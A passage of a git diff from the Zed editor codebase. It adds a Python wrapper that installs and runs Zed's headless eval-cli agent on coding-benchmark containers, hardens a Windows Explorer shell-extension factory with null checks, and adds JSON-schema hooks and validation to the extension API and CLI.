eprintln!("[eval-cli] subagent spawned: {session_id}"); + } + _ => {} + } +} diff --git a/crates/eval_cli/zed_eval/__init__.py 
b/crates/eval_cli/zed_eval/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..8cf07a06883a70660eb4bb3ca5a20ae304e6871b --- /dev/null +++ b/crates/eval_cli/zed_eval/__init__.py @@ -0,0 +1,3 @@ +from zed_eval.agent import ZedAgent + +__all__ = ["ZedAgent"] diff --git a/crates/eval_cli/zed_eval/agent.py b/crates/eval_cli/zed_eval/agent.py new file mode 100644 index 0000000000000000000000000000000000000000..54403e9a2531fdf772330ea986e45a37cf62418a --- /dev/null +++ b/crates/eval_cli/zed_eval/agent.py @@ -0,0 +1,437 @@ +"""Harbor agent wrapper for Zed's eval-cli binary. + +Usage: + # Build eval-cli locally first: + cargo build --release -p eval_cli + + # Run via Harbor with a local binary: + harbor run -d "dataset@version" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak binary_path=/path/to/target/release/eval-cli \ + --agent-model anthropic/claude-sonnet-4-6-latest + + # Or with a download URL (for CI): + harbor run -d "dataset@version" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak download_url=https://example.com/eval-cli \ + --agent-model anthropic/claude-sonnet-4-6-latest +""" + +import json +import os +import shlex +from pathlib import Path + +from harbor.agents.installed.base import BaseInstalledAgent, with_prompt_template +from harbor.environments.base import BaseEnvironment +from harbor.models.agent.context import AgentContext + + +class ZedAgent(BaseInstalledAgent): + """Runs Zed's headless AI agent (eval-cli) to solve tasks. + + The eval-cli binary boots a headless GPUI application and uses the same + NativeAgent + AcpThread pipeline as the production Zed editor, driving + the full agentic loop (tool calls, subagents, retries) without a GUI.
+ """ + + def __init__( + self, + logs_dir: Path, + binary_path: str | None = None, + download_url: str | None = None, + *args, + **kwargs, + ): + super().__init__(logs_dir, *args, **kwargs) + self._binary_path = binary_path + self._download_url = download_url or os.environ.get("EVAL_CLI_DOWNLOAD_URL") + + @staticmethod + def name() -> str: + return "zed" + + async def _detect_workdir(self, environment: BaseEnvironment) -> str: + """Detect the repo working directory inside the container. + + Checks, in order: + 1. Explicit ``EVAL_CLI_WORKDIR`` extra-env override + 2. ``/app`` (SWE-bench Pro) + 3. ``/testbed`` (SWE-bench Verified) + 4. ``/repo`` + 5. First git repo found under ``/`` (max depth 3) + """ + override = self._extra_env.get("EVAL_CLI_WORKDIR") + if override: + return override + + result = await self.exec_as_agent( + environment, + command=( + "for d in /app /testbed /repo; do " + ' if [ -d "$d/.git" ]; then echo "$d"; exit 0; fi; ' + "done; " + "find / -maxdepth 3 -name .git -type d 2>/dev/null " + '| head -1 | sed "s|/.git$||"' + ), + ) + workdir = result.stdout.strip() + if not workdir: + raise RuntimeError( + "Could not find a git repository in the container. " + "Set EVAL_CLI_WORKDIR explicitly via --ae EVAL_CLI_WORKDIR=/path/to/repo" + ) + return workdir + + async def install(self, environment: BaseEnvironment) -> None: + # Detect the package manager and install base dependencies. + # Supports Debian/Ubuntu (apt-get), Alpine (apk), and + # Fedora/RHEL/CentOS (dnf/yum). 
+ await self.exec_as_root( + environment, + command=( + "if command -v apt-get >/dev/null 2>&1; then " + " apt-get update && " + " apt-get install -y --no-install-recommends ca-certificates curl git; " + "elif command -v apk >/dev/null 2>&1; then " + " apk add --no-cache ca-certificates curl git bash coreutils gcompat libstdc++; " + "elif command -v dnf >/dev/null 2>&1; then " + " dnf install -y ca-certificates curl git; " + "elif command -v yum >/dev/null 2>&1; then " + " yum install -y ca-certificates curl git; " + "else " + " echo 'WARNING: No supported package manager found (apt-get, apk, dnf, yum)' >&2; " + "fi" + ), + env={"DEBIAN_FRONTEND": "noninteractive"}, + ) + + # ── Non-essential tooling ───────────────────────────────────── + # Everything below here (Node.js, LSPs, uv/ruff) is nice-to-have. + # If any step fails (e.g. musl incompatibility, network issues), + # log a warning and continue — the agent can still work without + # pre-installed language servers. + + await self._install_node(environment) + await self._install_lsps(environment) + await self._install_uv_and_ruff(environment) + + if self._binary_path: + binary = Path(self._binary_path) + if not binary.exists(): + raise FileNotFoundError( + f"eval-cli binary not found at {binary}. " + "Build it with: cargo build --release -p eval_cli" + ) + await environment.upload_file( + source_path=binary, + target_path="/usr/local/bin/eval-cli", + ) + await self.exec_as_root( + environment, + command="chmod +x /usr/local/bin/eval-cli && eval-cli --help", + ) + return + + if self._download_url: + await self.exec_as_root( + environment, + command=( + f"curl -fsSL {shlex.quote(self._download_url)} " + "-o /usr/local/bin/eval-cli && " + "chmod +x /usr/local/bin/eval-cli && " + "eval-cli --help" + ), + ) + return + + raise ValueError( + "No eval-cli binary provided. " + "Either pass binary_path=/path/to/target/release/eval-cli " + "or set download_url=/EVAL_CLI_DOWNLOAD_URL." 
+ ) + + async def _install_node(self, environment: BaseEnvironment) -> None: + """Install Node.js from official binary tarballs. + + Uses the musl build on Alpine and the glibc build elsewhere. + Skips if node is already on PATH. + """ + try: + await self.exec_as_root( + environment, + command=( + "if command -v node >/dev/null 2>&1; then " + ' echo "Node.js already available: $(node --version)"; ' + "else " + " NODE_VER=v22.14.0; " + " ARCH=$(uname -m); " + ' case "$ARCH" in ' + " x86_64) NODE_ARCH=x64 ;; " + " aarch64) NODE_ARCH=arm64 ;; " + ' *) echo "WARNING: unsupported arch $ARCH for Node.js" >&2; exit 0 ;; ' + " esac; " + " if ldd /bin/sh 2>&1 | grep -qi musl; then " + ' NODE_URL="https://unofficial-builds.nodejs.org/download/release/${NODE_VER}/node-${NODE_VER}-linux-${NODE_ARCH}-musl.tar.gz"; ' + " else " + ' NODE_URL="https://nodejs.org/dist/${NODE_VER}/node-${NODE_VER}-linux-${NODE_ARCH}.tar.gz"; ' + " fi; " + ' echo "Downloading Node.js from $NODE_URL"; ' + ' curl -fsSL "$NODE_URL" | tar -xz -C /usr/local --strip-components=1; ' + ' echo "Installed Node.js $(node --version)"; ' + "fi" + ), + ) + except Exception as exc: + self.logger.warning("Node.js installation failed (non-fatal): %s", exc) + + async def _install_lsps(self, environment: BaseEnvironment) -> None: + """Pre-install language servers so Zed doesn't download them at runtime. + + Each LSP is installed independently so one failure doesn't block the rest. + """ + # npm-based LSPs — skip all if npm is not available. 
+ try: + await self.exec_as_agent( + environment, + command="command -v npm >/dev/null 2>&1", + ) + except Exception: + self.logger.warning("npm not available — skipping npm-based LSP installs") + return + + lsp_installs = [ + ( + "basedpyright", + 'DIR="$ZED_DATA_DIR/languages/basedpyright"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact basedpyright', + ), + ( + "typescript-language-server", + 'DIR="$ZED_DATA_DIR/languages/typescript-language-server"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact typescript typescript-language-server', + ), + ( + "vtsls", + 'DIR="$ZED_DATA_DIR/languages/vtsls"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact @vtsls/language-server typescript', + ), + ( + "tailwindcss-language-server", + 'DIR="$ZED_DATA_DIR/languages/tailwindcss-language-server"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact @tailwindcss/language-server', + ), + ] + + for name, cmd in lsp_installs: + try: + await self.exec_as_agent( + environment, + command=( + 'ZED_DATA_DIR="${XDG_DATA_HOME:-$HOME/.local/share}/zed"; ' + + cmd + ), + ) + except Exception as exc: + self.logger.warning( + "LSP install '%s' failed (non-fatal): %s", name, exc + ) + + # eslint — downloaded from GitHub and compiled separately. + try: + await self.exec_as_agent( + environment, + command=( + "set -euo pipefail; " + 'ZED_DATA_DIR="${XDG_DATA_HOME:-$HOME/.local/share}/zed"; ' + 'ESLINT_DIR="$ZED_DATA_DIR/languages/eslint/vscode-eslint-2.4.4"; ' + 'mkdir -p "$ESLINT_DIR"; ' + 'curl -fsSL "https://github.com/zed-industries/vscode-eslint/archive/refs/tags/release/2.4.4.tar.gz" ' + '| tar -xz -C "$ESLINT_DIR"; ' + 'mv "$ESLINT_DIR"/vscode-eslint-release-2.4.4 "$ESLINT_DIR/vscode-eslint"; ' + 'cd "$ESLINT_DIR/vscode-eslint" && npm install && npm run compile' + ), + ) + except Exception as exc: + self.logger.warning("eslint LSP install failed (non-fatal): %s", exc) + + # gopls — only when Go is present. 
Guarded by a 120s timeout so slow + # compilation can never eat the full setup budget. + gopls_script = ( + "if command -v go >/dev/null 2>&1; then " + "if go install golang.org/x/tools/gopls@latest 2>/dev/null; then " + "echo 'Installed gopls@latest'; " + "else " + ' MY_GO=$(go env GOVERSION | sed "s/^go//"); ' + " for v in $(curl -fsSL " + "https://proxy.golang.org/golang.org/x/tools/gopls/@v/list 2>/dev/null" + " | grep -E '^v[0-9]+\\.[0-9]+\\.[0-9]+$' | sort -rV | head -5); do " + " NEED=$(curl -fsSL " + '"https://proxy.golang.org/golang.org/x/tools/gopls/@v/${v}.mod"' + " 2>/dev/null | awk '/^go /{print $2; exit}'); " + ' if [ -n "$NEED" ] ' + ' && [ "$(printf \'%s\\n%s\\n\' "$NEED" "$MY_GO" ' + ' | sort -V | head -1)" = "$NEED" ]; then ' + ' echo "Installing gopls $v (compatible with Go $MY_GO)"; ' + ' go install "golang.org/x/tools/gopls@$v" && break; ' + " fi; " + " done; " + "fi; " + "fi" + ) + try: + await self.exec_as_agent( + environment, + command=( + "timeout 120 bash -c " + + shlex.quote(gopls_script) + + " || echo 'WARNING: gopls installation timed out or failed -- skipping'" + ), + ) + except Exception as exc: + self.logger.warning("gopls install failed (non-fatal): %s", exc) + + async def _install_uv_and_ruff(self, environment: BaseEnvironment) -> None: + """Install uv and ruff for Python tooling.""" + try: + await self.exec_as_agent( + environment, + command=( + "curl -LsSf https://astral.sh/uv/install.sh | sh && " + '. 
"$HOME/.local/bin/env"' + ), + ) + + agent_home_result = await self.exec_as_agent( + environment, + command='printf %s "$HOME"', + ) + agent_home = agent_home_result.stdout.strip() + if not agent_home: + self.logger.warning( + "Could not determine agent home directory — skipping uv symlinks" + ) + return + + await self.exec_as_root( + environment, + command=( + f"ln -sf {shlex.quote(agent_home + '/.local/bin/uv')} /usr/local/bin/uv && " + f"ln -sf {shlex.quote(agent_home + '/.local/bin/uvx')} /usr/local/bin/uvx" + ), + ) + + await self.exec_as_agent( + environment, + command='export PATH="$HOME/.local/bin:$PATH" && uv tool install ruff', + ) + except Exception as exc: + self.logger.warning("uv/ruff installation failed (non-fatal): %s", exc) + + def populate_context_post_run(self, context: AgentContext) -> None: + result_data = None + for json_file in self.logs_dir.rglob("result.json"): + try: + result_data = json.loads(json_file.read_text()) + break + except (json.JSONDecodeError, OSError): + continue + + if result_data is None: + self.logger.warning("Could not find or parse result.json from eval-cli") + return + + if result_data.get("input_tokens") is not None: + context.n_input_tokens = result_data["input_tokens"] + if result_data.get("output_tokens") is not None: + context.n_output_tokens = result_data["output_tokens"] + if result_data.get("cache_read_input_tokens") is not None: + context.n_cache_tokens = result_data["cache_read_input_tokens"] + + context.metadata = { + "status": result_data.get("status"), + "duration_secs": result_data.get("duration_secs"), + "model": result_data.get("model"), + } + + def _get_api_env(self) -> dict[str, str]: + env: dict[str, str] = {} + if not self.model_name or "/" not in self.model_name: + return env + + provider = self.model_name.split("/", 1)[0] + provider_env_map = { + "anthropic": "ANTHROPIC_API_KEY", + "openai": "OPENAI_API_KEY", + "google": "GEMINI_API_KEY", + "gemini": "GEMINI_API_KEY", + "deepseek": 
"DEEPSEEK_API_KEY", + "mistral": "MISTRAL_API_KEY", + } + + env_var = provider_env_map.get(provider) + if env_var: + api_key = os.environ.get(env_var, "") + if api_key: + env[env_var] = api_key + + return env + + @with_prompt_template + async def run( + self, instruction: str, environment: BaseEnvironment, context: AgentContext + ) -> None: + escaped_instruction = shlex.quote(instruction) + env = self._get_api_env() + + workdir = await self._detect_workdir(environment) + + parts = [ + "eval-cli", + f"--workdir {shlex.quote(workdir)}", + "--output-dir /logs/agent", + ] + + if self.model_name: + parts.append(f"--model {shlex.quote(self.model_name)}") + + timeout = self._extra_env.get("EVAL_CLI_TIMEOUT") + if timeout: + parts.append(f"--timeout {shlex.quote(timeout)}") + + staff = self._extra_env.get("EVAL_CLI_STAFF") + if staff and staff.lower() == "false": + parts.append("--no-staff") + + reasoning_effort = self._extra_env.get("EVAL_CLI_REASONING_EFFORT") + if reasoning_effort: + parts.append(f"--reasoning-effort {shlex.quote(reasoning_effort)}") + + enable_thinking = self._extra_env.get("EVAL_CLI_ENABLE_THINKING") + if enable_thinking: + if enable_thinking.lower() == "true": + parts.append("--enable-thinking") + elif enable_thinking.lower() == "false": + parts.append("--disable-thinking") + + parts.append(f"--instruction {escaped_instruction}") + + await self.exec_as_agent( + environment, + command=( + " ".join(parts) + " 2>&1 | if command -v stdbuf >/dev/null 2>&1;" + " then stdbuf -oL tee /logs/agent/eval-cli.txt;" + " else tee /logs/agent/eval-cli.txt; fi" + ), + env=env, + ) + + await self.exec_as_agent( + environment, + command=( + "git add -A && " + "git diff --cached HEAD > /logs/agent/patch.diff && " + 'echo "Patch size: $(wc -c < /logs/agent/patch.diff) bytes"' + ), + cwd=workdir, + ) diff --git a/crates/eval_cli/zed_eval/pyproject.toml b/crates/eval_cli/zed_eval/pyproject.toml new file mode 100644 index 
0000000000000000000000000000000000000000..416c025826eaf99ad029c914b609aa28abd56f00 --- /dev/null +++ b/crates/eval_cli/zed_eval/pyproject.toml @@ -0,0 +1,10 @@ +[project] +name = "zed-eval" +version = "0.1.0" +description = "Harbor agent wrapper for Zed's eval-cli" +requires-python = ">=3.12" +dependencies = ["harbor"] + +[build-system] +requires = ["setuptools"] +build-backend = "setuptools.build_meta" diff --git a/crates/explorer_command_injector/src/explorer_command_injector.rs b/crates/explorer_command_injector/src/explorer_command_injector.rs index bfa2a0326c9975037ed860acfdee7cd32e3075d8..1bd85339a9fd8958c496eccf2bedcb1610c56557 100644 --- a/crates/explorer_command_injector/src/explorer_command_injector.rs +++ b/crates/explorer_command_injector/src/explorer_command_injector.rs @@ -106,18 +106,17 @@ impl IClassFactory_Impl for ExplorerCommandInjectorFactory_Impl { riid: *const windows_core::GUID, ppvobject: *mut *mut core::ffi::c_void, ) -> Result<()> { + if ppvobject.is_null() || riid.is_null() { + return Err(windows::Win32::Foundation::E_POINTER.into()); + } + unsafe { *ppvobject = std::ptr::null_mut(); } + if punkouter.is_none() { let factory: IExplorerCommand = ExplorerCommandInjector {}.into(); - let ret = unsafe { factory.query(riid, ppvobject).ok() }; - if ret.is_ok() { - unsafe { - *ppvobject = factory.into_raw(); - } - } - ret + unsafe { factory.query(riid, ppvobject).ok() } } else { Err(E_INVALIDARG.into()) } @@ -145,19 +144,17 @@ extern "system" fn DllGetClassObject( iid: *const GUID, out: *mut *mut std::ffi::c_void, ) -> HRESULT { + if out.is_null() || class_id.is_null() || iid.is_null() { + return E_INVALIDARG; + } + unsafe { *out = std::ptr::null_mut(); } let class_id = unsafe { *class_id }; if class_id == MODULE_ID { let instance: IClassFactory = ExplorerCommandInjectorFactory {}.into(); - let ret = unsafe { instance.query(iid, out) }; - if ret.is_ok() { - unsafe { - *out = instance.into_raw(); - } - } - ret + unsafe { instance.query(iid, out) } 
} else { CLASS_E_CLASSNOTAVAILABLE } diff --git a/crates/extension/src/extension.rs b/crates/extension/src/extension.rs index 88f2bea0c0c68480a2ad67f536ecf9d465a6a9ae..2ec8c8ea5f4032522dcaf846736aeacc00de585f 100644 --- a/crates/extension/src/extension.rs +++ b/crates/extension/src/extension.rs @@ -11,7 +11,6 @@ use std::sync::Arc; use ::lsp::LanguageServerName; use anyhow::{Context as _, Result, bail}; use async_trait::async_trait; -use fs::normalize_path; use gpui::{App, Task}; use language::LanguageName; use semver::Version; @@ -57,7 +56,7 @@ pub trait Extension: Send + Sync + 'static { /// Returns a path relative to this extension's working directory. fn path_from_extension(&self, path: &Path) -> PathBuf { - normalize_path(&self.work_dir().join(path)) + util::normalize_path(&self.work_dir().join(path)) } async fn language_server_command( @@ -80,6 +79,18 @@ pub trait Extension: Send + Sync + 'static { worktree: Arc, ) -> Result>; + async fn language_server_initialization_options_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result>; + + async fn language_server_workspace_configuration_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result>; + async fn language_server_additional_initialization_options( &self, language_server_id: LanguageServerName, diff --git a/crates/extension/src/extension_builder.rs b/crates/extension/src/extension_builder.rs index eae51846f164d4aa6baf2fac897d25a8961b4d6c..f0e789994127c9347c8eb6b8d16417ba7eaaf831 100644 --- a/crates/extension/src/extension_builder.rs +++ b/crates/extension/src/extension_builder.rs @@ -7,6 +7,7 @@ use anyhow::{Context as _, Result, bail}; use futures::{StreamExt, io}; use heck::ToSnakeCase; use http_client::{self, AsyncBody, HttpClient}; +use language::LanguageConfig; use serde::Deserialize; use std::{ env, fs, mem, @@ -295,16 +296,12 @@ impl ExtensionBuilder { let remotes_output = util::command::new_command("git") .arg("--git-dir") 
.arg(&git_dir) - .args(["remote", "-v"]) + .args(["remote", "get-url", "origin"]) + .env("GIT_CONFIG_GLOBAL", "/dev/null") .output() .await?; let has_remote = remotes_output.status.success() - && String::from_utf8_lossy(&remotes_output.stdout) - .lines() - .any(|line| { - let mut parts = line.split(|c: char| c.is_whitespace()); - parts.next() == Some("origin") && parts.any(|part| part == url) - }); + && String::from_utf8_lossy(&remotes_output.stdout).trim() == url; if !has_remote { bail!( "grammar directory '{}' already exists, but is not a git clone of '{}'", @@ -583,7 +580,7 @@ async fn populate_defaults( while let Some(language_dir) = language_dir_entries.next().await { let language_dir = language_dir?; - let config_path = language_dir.join("config.toml"); + let config_path = language_dir.join(LanguageConfig::FILE_NAME); if fs.is_file(config_path.as_path()).await { let relative_language_dir = language_dir.strip_prefix(extension_path)?.to_path_buf(); diff --git a/crates/extension/src/extension_host_proxy.rs b/crates/extension/src/extension_host_proxy.rs index 5efc015483f10915a2e6646c3359bd47b90cfe69..c8bb7ef1343a3772c115f85306dd5631a6f4dd71 100644 --- a/crates/extension/src/extension_host_proxy.rs +++ b/crates/extension/src/extension_host_proxy.rs @@ -8,7 +8,7 @@ use language::{BinaryStatus, LanguageMatcher, LanguageName, LoadedLanguage}; use lsp::LanguageServerName; use parking_lot::RwLock; -use crate::{Extension, SlashCommand}; +use crate::Extension; #[derive(Default)] struct GlobalExtensionHostProxy(Arc); @@ -29,7 +29,6 @@ pub struct ExtensionHostProxy { language_proxy: RwLock>>, language_server_proxy: RwLock>>, snippet_proxy: RwLock>>, - slash_command_proxy: RwLock>>, context_server_proxy: RwLock>>, debug_adapter_provider_proxy: RwLock>>, language_model_provider_proxy: RwLock>>, @@ -55,7 +54,6 @@ impl ExtensionHostProxy { language_proxy: RwLock::default(), language_server_proxy: RwLock::default(), snippet_proxy: RwLock::default(), - slash_command_proxy: 
RwLock::default(), context_server_proxy: RwLock::default(), debug_adapter_provider_proxy: RwLock::default(), language_model_provider_proxy: RwLock::default(), @@ -82,10 +80,6 @@ impl ExtensionHostProxy { self.snippet_proxy.write().replace(Arc::new(proxy)); } - pub fn register_slash_command_proxy(&self, proxy: impl ExtensionSlashCommandProxy) { - self.slash_command_proxy.write().replace(Arc::new(proxy)); - } - pub fn register_context_server_proxy(&self, proxy: impl ExtensionContextServerProxy) { self.context_server_proxy.write().replace(Arc::new(proxy)); } @@ -356,30 +350,6 @@ impl ExtensionSnippetProxy for ExtensionHostProxy { } } -pub trait ExtensionSlashCommandProxy: Send + Sync + 'static { - fn register_slash_command(&self, extension: Arc, command: SlashCommand); - - fn unregister_slash_command(&self, command_name: Arc); -} - -impl ExtensionSlashCommandProxy for ExtensionHostProxy { - fn register_slash_command(&self, extension: Arc, command: SlashCommand) { - let Some(proxy) = self.slash_command_proxy.read().clone() else { - return; - }; - - proxy.register_slash_command(extension, command) - } - - fn unregister_slash_command(&self, command_name: Arc) { - let Some(proxy) = self.slash_command_proxy.read().clone() else { - return; - }; - - proxy.unregister_slash_command(command_name) - } -} - pub trait ExtensionContextServerProxy: Send + Sync + 'static { fn register_context_server( &self, diff --git a/crates/extension_api/src/extension_api.rs b/crates/extension_api/src/extension_api.rs index acd1cba47b0150b85ddec8baafa8b5f341460a39..6607cdc9697d017ac51818bb277a1392a8d67d01 100644 --- a/crates/extension_api/src/extension_api.rs +++ b/crates/extension_api/src/extension_api.rs @@ -100,6 +100,28 @@ pub trait Extension: Send + Sync { Ok(None) } + /// Returns the JSON schema for the initialization options. + /// + /// The schema must conform to the JSON Schema speification. 
+ fn language_server_initialization_options_schema( + &mut self, + _language_server_id: &LanguageServerId, + _worktree: &Worktree, + ) -> Option { + None + } + + /// Returns the JSON schema for the workspace configuration. + /// + /// The schema must conform to the JSON Schema specification. + fn language_server_workspace_configuration_schema( + &mut self, + _language_server_id: &LanguageServerId, + _worktree: &Worktree, + ) -> Option { + None + } + /// Returns the initialization options to pass to the other language server. fn language_server_additional_initialization_options( &mut self, @@ -370,6 +392,26 @@ impl wit::Guest for Component { .and_then(|value| serde_json::to_string(&value).ok())) } + fn language_server_initialization_options_schema( + language_server_id: String, + worktree: &Worktree, + ) -> Option { + let language_server_id = LanguageServerId(language_server_id); + extension() + .language_server_initialization_options_schema(&language_server_id, worktree) + .and_then(|value| serde_json::to_string(&value).ok()) + } + + fn language_server_workspace_configuration_schema( + language_server_id: String, + worktree: &Worktree, + ) -> Option { + let language_server_id = LanguageServerId(language_server_id); + extension() + .language_server_workspace_configuration_schema(&language_server_id, worktree) + .and_then(|value| serde_json::to_string(&value).ok()) + } + fn language_server_additional_initialization_options( language_server_id: String, target_language_server_id: String, diff --git a/crates/extension_api/src/settings.rs b/crates/extension_api/src/settings.rs index a133a8027a4361c1f92e3fdecc73664497b4e6d6..bb9f2e20b23efd077e37b6c90b245f120c1d6ab9 100644 --- a/crates/extension_api/src/settings.rs +++ b/crates/extension_api/src/settings.rs @@ -1,6 +1,6 @@ //! Provides access to Zed settings. 
-#[path = "../wit/since_v0.2.0/settings.rs"] +#[path = "../wit/since_v0.8.0/settings.rs"] mod types; use crate::{Project, Result, SettingsLocation, Worktree, wit}; diff --git a/crates/extension_api/wit/since_v0.8.0/extension.wit b/crates/extension_api/wit/since_v0.8.0/extension.wit index fc2735c72b463225feed0d371ae8274b56c78be1..052d670364b6958b51184def893c49f5b6abdc9e 100644 --- a/crates/extension_api/wit/since_v0.8.0/extension.wit +++ b/crates/extension_api/wit/since_v0.8.0/extension.wit @@ -101,6 +101,16 @@ world extension { /// Returns the workspace configuration options to pass to the language server. export language-server-workspace-configuration: func(language-server-id: string, worktree: borrow) -> result, string>; + /// Returns the JSON schema for the initialization options. + /// + /// The schema is represented as a JSON string conforming to the JSON Schema specification. + export language-server-initialization-options-schema: func(language-server-id: string, worktree: borrow) -> option; + + /// Returns the JSON schema for the workspace configuration. + /// + /// The schema is represented as a JSON string conforming to the JSON Schema specification. + export language-server-workspace-configuration-schema: func(language-server-id: string, worktree: borrow) -> option; + /// Returns the initialization options to pass to the other language server. 
export language-server-additional-initialization-options: func(language-server-id: string, target-language-server-id: string, worktree: borrow) -> result, string>; diff --git a/crates/extension_api/wit/since_v0.8.0/settings.rs b/crates/extension_api/wit/since_v0.8.0/settings.rs index 19e28c1ba955a998fe7b97f3eacb57c4b1104154..7c77dc79baf7ab89bec74b6c66ea5b736d2ba858 100644 --- a/crates/extension_api/wit/since_v0.8.0/settings.rs +++ b/crates/extension_api/wit/since_v0.8.0/settings.rs @@ -6,6 +6,8 @@ use std::{collections::HashMap, num::NonZeroU32}; pub struct LanguageSettings { /// How many columns a tab should occupy. pub tab_size: NonZeroU32, + /// The preferred line length (column at which to wrap). + pub preferred_line_length: u32, } /// The settings for a particular language server. diff --git a/crates/extension_cli/Cargo.toml b/crates/extension_cli/Cargo.toml index 9795c13e75864184299fba026f499bbcbefee117..c019a323196e96d0b7a0131cc518e599154cd350 100644 --- a/crates/extension_cli/Cargo.toml +++ b/crates/extension_cli/Cargo.toml @@ -26,8 +26,10 @@ reqwest_client.workspace = true serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true +settings_content.workspace = true snippet_provider.workspace = true -theme.workspace = true +task.workspace = true +theme_settings.workspace = true tokio = { workspace = true, features = ["full"] } toml.workspace = true tree-sitter.workspace = true diff --git a/crates/extension_cli/src/main.rs b/crates/extension_cli/src/main.rs index baefb72fe4bd986edbfaa866e50663b159eff3c9..57845754fc8263c516bc3aec7d1ae0a2ffe68a2f 100644 --- a/crates/extension_cli/src/main.rs +++ b/crates/extension_cli/src/main.rs @@ -1,3 +1,4 @@ +use std::collections::BTreeSet; use std::collections::HashMap; use std::env; use std::fs; @@ -7,12 +8,15 @@ use std::sync::Arc; use ::fs::{CopyOptions, Fs, RealFs, copy_recursive}; use anyhow::{Context as _, Result, anyhow, bail}; use clap::Parser; +use cloud_api_types::ExtensionProvides; 
use extension::extension_builder::{CompileExtensionOptions, ExtensionBuilder}; use extension::{ExtensionManifest, ExtensionSnippets}; use language::LanguageConfig; use reqwest_client::ReqwestClient; +use settings_content::SemanticTokenRules; use snippet_provider::file_to_snippets; use snippet_provider::format::VsSnippetsFile; +use task::TaskTemplates; use tokio::process::Command; use tree_sitter::{Language, Query, WasmStore}; @@ -78,10 +82,7 @@ async fn main() -> Result<()> { .context("failed to compile extension")?; let extension_provides = manifest.provides(); - - if extension_provides.is_empty() { - bail!("extension does not provide any features"); - } + validate_extension_features(&extension_provides)?; let grammars = test_grammars(&manifest, &extension_path, &mut wasm_store)?; test_languages(&manifest, &extension_path, &grammars)?; @@ -201,7 +202,7 @@ async fn copy_extension_resources( }, ) .await - .with_context(|| "failed to copy icons")?; + .context("failed to copy icons")?; } for (_, agent_entry) in &manifest.agent_servers { @@ -295,6 +296,22 @@ async fn copy_extension_resources( Ok(()) } +fn validate_extension_features(provides: &BTreeSet) -> Result<()> { + if provides.is_empty() { + bail!("extension does not provide any features"); + } + + if provides.contains(&ExtensionProvides::Themes) && provides.len() != 1 { + bail!("extension must not provide other features along with themes"); + } + + if provides.contains(&ExtensionProvides::IconThemes) && provides.len() != 1 { + bail!("extension must not provide other features along with icon themes"); + } + + Ok(()) +} + fn test_grammars( manifest: &ExtensionManifest, extension_path: &Path, @@ -323,9 +340,8 @@ fn test_languages( ) -> Result<()> { for relative_language_dir in &manifest.languages { let language_dir = extension_path.join(relative_language_dir); - let config_path = language_dir.join("config.toml"); - let config_content = fs::read_to_string(&config_path)?; - let config: LanguageConfig = 
toml::from_str(&config_content)?; + let config_path = language_dir.join(LanguageConfig::FILE_NAME); + let config = LanguageConfig::load(&config_path)?; let grammar = if let Some(name) = &config.grammar { Some( grammars @@ -339,18 +355,48 @@ fn test_languages( let query_entries = fs::read_dir(&language_dir)?; for entry in query_entries { let entry = entry?; - let query_path = entry.path(); - if query_path.extension() == Some("scm".as_ref()) { - let grammar = grammar.with_context(|| { - format! { - "language {} provides query {} but no grammar", - config.name, - query_path.display() - } - })?; - - let query_source = fs::read_to_string(&query_path)?; - let _query = Query::new(grammar, &query_source)?; + let file_path = entry.path(); + + let Some(file_name) = file_path.file_name().and_then(|name| name.to_str()) else { + continue; + }; + + match file_name { + LanguageConfig::FILE_NAME => { + // Loaded above + } + SemanticTokenRules::FILE_NAME => { + let _token_rules = SemanticTokenRules::load(&file_path)?; + } + TaskTemplates::FILE_NAME => { + let task_file_content = std::fs::read(&file_path).with_context(|| { + anyhow!( + "Failed to read tasks file at {path}", + path = file_path.display() + ) + })?; + let _task_templates = + serde_json_lenient::from_slice::(&task_file_content) + .with_context(|| { + anyhow!( + "Failed to parse tasks file at {path}", + path = file_path.display() + ) + })?; + } + _ if file_name.ends_with(".scm") => { + let grammar = grammar.with_context(|| { + format! 
{ + "language {} provides query {} but no grammar", + config.name, + file_path.display() + } + })?; + + let query_source = fs::read_to_string(&file_path)?; + let _query = Query::new(grammar, &query_source)?; + } + _ => {} } } @@ -367,7 +413,8 @@ async fn test_themes( ) -> Result<()> { for relative_theme_path in &manifest.themes { let theme_path = extension_path.join(relative_theme_path); - let theme_family = theme::read_user_theme(&theme_path, fs.clone()).await?; + let theme_family = + theme_settings::deserialize_user_theme(&fs.load_bytes(&theme_path).await?)?; log::info!("loaded theme family {}", theme_family.name); for theme in &theme_family.themes { diff --git a/crates/extension_host/Cargo.toml b/crates/extension_host/Cargo.toml index c4d1f6d98c82ee348f4a7453a3bb6e3255924b77..8dd949844f03ed7d625a2374aaf99b7c38b6522f 100644 --- a/crates/extension_host/Cargo.toml +++ b/crates/extension_host/Cargo.toml @@ -65,9 +65,10 @@ language = { workspace = true, features = ["test-support"] } language_extension.workspace = true parking_lot.workspace = true project = { workspace = true, features = ["test-support"] } -rand.workspace = true + reqwest_client.workspace = true theme = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true theme_extension.workspace = true zlog.workspace = true diff --git a/crates/extension_host/src/extension_host.rs b/crates/extension_host/src/extension_host.rs index 6699a9dca099177cfd550ba0f68ef62828356d15..03f340a56a98eb826110b245505c2b92774a0e0f 100644 --- a/crates/extension_host/src/extension_host.rs +++ b/crates/extension_host/src/extension_host.rs @@ -17,8 +17,7 @@ use extension::extension_builder::{CompileExtensionOptions, ExtensionBuilder}; use extension::{ ExtensionContextServerProxy, ExtensionDebugAdapterProviderProxy, ExtensionEvents, ExtensionGrammarProxy, ExtensionHostProxy, ExtensionLanguageProxy, - ExtensionLanguageServerProxy, ExtensionSlashCommandProxy, ExtensionSnippetProxy, - ExtensionThemeProxy, + 
